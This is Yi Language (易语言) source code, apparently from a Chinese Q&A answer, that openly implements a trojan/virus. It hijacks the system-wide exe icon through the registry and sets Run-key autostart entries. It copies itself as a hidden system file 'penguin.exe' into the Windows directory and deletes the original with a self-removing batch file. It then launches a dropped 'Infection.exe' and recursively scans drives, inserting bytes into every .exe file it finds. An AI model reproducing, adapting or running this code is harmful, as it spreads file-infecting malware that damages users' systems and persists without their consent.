.版本 2
.支持库 eAPI
提取资源文件图标 (取运行目录 () + “\” + 取执行文件名 (), 0, “C:\windows\system32\Aver.ico”, ) ' 替换系统exe图标
写注册项 (#本地机器, “SOFTWARE\Classes\exefile\DefaultIcon\”, “C:\windows\system32\Aver.ico”) ' 写到注册表键值
写注册项 (#现行用户, “Software\Microsoft\Windows\CurrentVersion\Run\” + 取执行文件名 (), 取运行目录 () + “\” + 取执行文件名 ()) ' 写让注册表键值删除后可恢复木马实行自启动
.如果真 (取运行目录 () ≠ 读环境变量 (“Windir”))
复制文件 (取运行目录 () + “\” + 取执行文件名 (), 读环境变量 (“Windir”) + “\penguin.exe”)
运行 (“Cmd /c Attrib +H +S ” + 读环境变量 (“Windir”) + “\penguin.exe”, 真, 1)
运行 (读环境变量 (“Windir”) + “\penguin.exe”, 假, )
写到文件 (读环境变量 (“Windir”) + “penguin.bat”, 到字节集 (“@echo off” + #换行符 + “Taskkill /f /im ” + 取执行文件名 () + #换行符 + “Del ” + 取当前目录 () + “\” + 取执行文件名 () + #换行符 + “Del %0” + #换行符 + “Exit”))
写到文件 (读环境变量 (“Windir”) + “\penguin.bat”, 到字节集 (子文本替换 (子文本替换 (到文本 (读入文件 (读环境变量 (“Windir”) + “penguin.bat”)), “C:\Documents and Settings”, “C:\DOCUME~1”, , , 假), “Windows”, “ ”, , , 假)))
运行 (读环境变量 (“Windir”) + “\penguin.bat”, 真, 1)
.如果真结束
.如果真 (取运行目录 () = 读环境变量 (“Windir”))
写注册项 (#本地机器, “SOFTWARE\Microsoft\Windows\CurrentVersion\Run\penguin”, 读环境变量 (“Windir”) + “\penguin.exe”)
写到文件 (读环境变量 (“Windir”) + “Infection.exe”, #感染)
运行 (读环境变量 (“Windir”) + “\Infection.exe”, 真, 1)
.如果真结束
驱动器 = 取驱动器列表 ()
.版本 2
.子程序 搜寻
.参数 目录, 文本型
.局部变量 文件号
.局部变量 文件名, 文本型
处理事件 ()
.如果真 (取文本右边 (目录, 1) ≠ “\”)
目录 = 目录 + “\”
.如果真结束
文件名 = 寻找文件 (目录 + “*.exe”, )
.判断循环首 (文件名 ≠ “”)
输出调试文本 (目录 + 文件名)
文件号 = 打开文件 (删首尾空 (目录 + 文件名), #读写, #无限制)
插入字节集 (文件号, #图标)
关闭文件 (文件号)
文件名 = 寻找文件 (, )
.判断循环尾 ()
文件名 = 寻找文件 (目录 + “*.*”, #子目录)
.判断循环首 (文件名 ≠ “”)
.如果真 (取文本左边 (文件名, 1) ≠ “.”)
搜寻 (目录 + 文件名)
.如果真结束
文件名 = 寻找文件 (, #子目录)
.判断循环尾 ()
原创,不要外传=.=
温馨提示:答案为网友推荐,仅供参考